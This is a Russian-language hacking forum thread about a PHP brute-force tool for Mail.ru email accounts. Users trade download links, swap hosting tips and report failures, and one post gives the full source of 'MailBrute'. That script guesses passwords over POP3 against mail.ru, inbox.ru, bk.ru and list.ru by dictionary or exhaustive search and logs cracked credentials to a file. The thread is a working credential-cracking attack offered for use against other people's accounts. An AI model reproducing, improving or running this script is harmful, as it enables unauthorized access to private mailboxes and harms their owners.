Mail.Ru BruteForce (PHP)

Discussion in 'Уязвимости Mail-сервисов' started by NOmeR1, 22 Sep 2007.

  1. max123

    max123 New Member

    Joined:
    24 May 2008
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0
    Неужели никто не знает на какой хост можно "большие" словари загружать?
     
  2. GumaNoiD

    GumaNoiD Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    67
    Likes Received:
    10
    Reputations:
    0
    дайте рабочий линк на брут плиз
     
  3. opy495

    opy495 Member

    Joined:
    23 Mar 2008
    Messages:
    37
    Likes Received:
    6
    Reputations:
    -5
    да брут не пашет че толку то
     
  4. MaoTzeDun

    MaoTzeDun New Member

    Joined:
    3 Jun 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    С чего ты взял что не пашет?!
     
  5. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    на свой хост
     
  6. crackmail

    crackmail Elder - Старейшина

    Joined:
    3 Jun 2008
    Messages:
    106
    Likes Received:
    19
    Reputations:
    10
    не пашет..
    ни на tu2.ru
    ни на freehostia
    ни на localhoste
    элементарный пароль не видит 123456789
     
  7. crackmail

    crackmail Elder - Старейшина

    Joined:
    3 Jun 2008
    Messages:
    106
    Likes Received:
    19
    Reputations:
    10
    есть у кого брут то?
    пашет он ?
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    да бруть не бруть -все равно получишь - ...

    На майлру не дураки - после нескольких десятков запросов к одному аккаунту - просто блочат
     
  9. ZloY_MakcNM

    ZloY_MakcNM Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    71
    Likes Received:
    14
    Reputations:
    0
    так че перезальет ктонить?
     
  10. crackmail

    crackmail Elder - Старейшина

    Joined:
    3 Jun 2008
    Messages:
    106
    Likes Received:
    19
    Reputations:
    10
    http://webfile.ru/2098305

    но он всеровно не пашет... :(
     
  11. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Залил на платный хост, в файл spisoc.txt вписал свой email, поставил правильный пароль, укузал брутить по списку email, в поле админ вбил второе мыло. Права выставлены на файл good.txt, время работы скрипта неограниченно - и ни чо не происходит... :( help!
     
  12. Black dead

    Black dead Elder - Старейшина

    Joined:
    27 May 2007
    Messages:
    170
    Likes Received:
    145
    Reputations:
    12
    mff у тя хост не подерживает фукцию отправки писем , с твоего хоста значит только брутить без получения верного пасса по почте
     
    2 people like this.
  13. crackmail

    crackmail Elder - Старейшина

    Joined:
    3 Jun 2008
    Messages:
    106
    Likes Received:
    19
    Reputations:
    10
    ну че работает у кого-нить?
     
  14. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    у меня нет...кучу вариантов перепробовал и забил на это дело) до чего-нибудь получше
     
  15. grishka

    grishka Active Member

    Joined:
    11 Aug 2007
    Messages:
    157
    Likes Received:
    255
    Reputations:
    4
    На платном вроде тоже не пашет
     
    1 person likes this.
  16. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    на этом хосте проверял скрипты отправки песем, всё работает, правда гдето на 500 банят и нужно ждать 1 час. Хост агава.
     
  17. KaZ@NoVa

    KaZ@NoVa Elder - Старейшина

    Joined:
    5 Jul 2008
    Messages:
    368
    Likes Received:
    438
    Reputations:
    -16
    на платном юзайте!) у парнише знакомого пашет всёё!)
     
  18. Kest

    Kest Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    35
    Likes Received:
    9
    Reputations:
    0
    подскажите, тогда хоть платный хостинг где это точно работает
     
  19. Hs_Mx

    Hs_Mx Banned

    Joined:
    16 Nov 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    -1
    че там вооще писать?)
     
  20. or1

    or1 Banned

    Joined:
    7 Sep 2008
    Messages:
    36
    Likes Received:
    4
    Reputations:
    0


    ребята скиньте плз сылку на этот скрипт каторый вы обсуждали все время, а то все сылки битые,
    хочу посмотреть и исправить,можете пока этот посмотреть как он...
    PHP:
    <html> 
    <head> 
    <title>MailBrute By Joker-jar</title> 
    <meta http-equiv=Content-Type content="text/html; charset=windows-1251"> 
    </head> 
    <body> 

    <? 

    set_time_limit(0); 
    ignore_user_abort(1); 
    error_reporting(0); 

    $servers = Array( 
    "mail" => "pop3.mail.ru", 
    "inbox" => "pop3.inbox.ru", 
    "bk" => "pop3.bk.ru", 
    "list" => "pop3.list.ru", 
    ); 

    $pop3port = 110; 

    $passfile = "pass.txt"; 
    $good = "good.txt"; 
    $bad = "bad.txt"; 

    function CheckPass($pop3server, $username, $pass) 

    global $pop3port; 
    $fp = fsockopen($pop3server, $pop3port, $errno, $errstr, 30); 
    if (!$fp) 
    return false; 
    $buf = fgets($fp, 128); 
    if ($buf[0] != "+") 

    fclose($fp); 
    return false; 

    fputs($fp,"user ".$username."\r\n"); 
    $buf = fgets($fp, 128); 
    if ($buf[0] != "+") 

    fclose($fp); 
    return false; 

    fputs($fp,"pass ".$pass."\r\n"); 
    $buf = fgets($fp, 128); 
    if (strlen($buf) > 3 && $buf[0] == "+") 

    fclose($fp); 
    return true; 

    fclose($fp); 
    return false; 


    function genstr($l, $alf) 

    $result = ""; 
    for ($i=0;$i<$l;$i++) 
    $result .= $alf[0]; 
    return $result; 


    function nextpass($p, $alf) 

    for ($i=0;$i<strlen($p);$i++) 

    if (strpos($alf,$p[$i]) == strlen($alf)-1) 

    $p[$i] = $alf[0]; 

    else 

    $p[$i] = $alf[strpos($alf,$p[$i])+1]; 
    return $p; 


    $p .= $alf[0]; 
    return $p; 


    if (isset($_POST["name"])) 

    if ($_POST["name"] === "") 

    echo "Отсутствует имя</body></html>"; 
    exit; 

    if (!isset($servers[$_POST["popserver"]])) 

    echo "Неправильно задан pop3 сервер</body></html>"; 
    exit; 

    settype($_POST["minl"],"int"); 
    settype($_POST["maxl"],"int"); 
    if ($_POST["minl"] == 0 || $_POST["maxl"] == 0 || $_POST["maxl"] - $_POST["minl"] < 0) 

    echo "Ошибка в параметрах длины пароля</body></html>"; 
    exit; 

    if ($_POST["dict"] !== "yes" && $_POST["alf"] === "") 

    echo "Алфавит пуст</body></html>"; 
    exit; 

    if ($_POST["dict"] === "yes" && (!file_exists($passfile) || filesize($passfile) == 0)) 

    echo "Файл $passfile пуст или отсутствует</body></html>"; 
    exit; 

    if ($_POST["dict"] !== "yes") 

    //Полный перебор 
    $startpass = genstr($_POST["minl"],$_POST["alf"]); 
    $endpass = genstr($_POST["maxl"]+1,$_POST["alf"]); 
    $curpass = $startpass; 
    while ($curpass != $endpass) 

    if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass)) 

    $f = fopen($good, 'ab'); 
    fwrite($f, $_POST["name"]." : ".$curpass."\r\n"); 
    fclose($f); 
    exit; 

    else 

    $f = fopen($bad, 'ab'); 
    fwrite($f, $_POST["name"]." : ".$curpass."\r\n"); 
    fclose($f); 

    $curpass = nextpass($curpass,$_POST["alf"]); 


    else 

    //Атака по словарю 
    $passes = file($passfile); 
    for($i=0; $i<count($passes);$i++) 

    $curpass = trim($passes[$i]); 
    if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass)) 

    $f = fopen($good, 'ab'); 
    fwrite($f, $_POST["name"]." : ".$curpass."\r\n"); 
    fclose($f); 
    exit; 

    else 

    $f = fopen($bad, 'ab'); 
    fwrite($f, $_POST["name"]." : ".$curpass."\r\n"); 
    fclose($f); 




    ?> 

    <fieldset style="width: 500"> 
    <legend>Параметры брута</legend> 
    <form method="POST"> 
    <table border="0"> 
    <tr><td> 
    <input type="text" name="name" style="width: 100"> 
    </td><td>@ 
    <select name="popserver" style="width: 100"> 
    <option value="mail" selected>mail.ru 
    <option value="inbox">inbox.ru 
    <option value="bk">bk.ru 
    <option value="list">list.ru 
    </select> 
    </td></tr> 
    <tr><td colspan="2"><br> 
    <input type="radio" name=dict value="yes" checked>Атака по словарю pass.txt<br> 
    <input type="radio" name=dict value="no">Атака полным перебором 
    </td></tr> 
    <tr><td style="text-align: right"> 
    алфавит: 
    </td><td> 
    <input type="text" name="alf" style="width: 200" value="abcdefghijklmnopqrstuvwxyz"> 
    </td></tr> 
    <tr><td style="text-align: right"> 
    мин длина: 
    </td><td> 
    <input type="text" name="minl" style="width: 50" value="1"> 
    </td></tr> 
    <tr><td style="text-align: right"> 
    макс длина: 
    </td><td> 
    <input type="text" name="maxl" style="width: 50" value="5"> 
    </td></tr> 
    <tr><td colspan="2"> 
    <br> 
    <input type="submit" value="Начать брут и идти спать"> 
    </td></tr> 
    </table> 
    </form> 
    </fieldset> 
    </body> 
    </html>

    PHP:
    set_time_limit(0); 
    <----без него лутче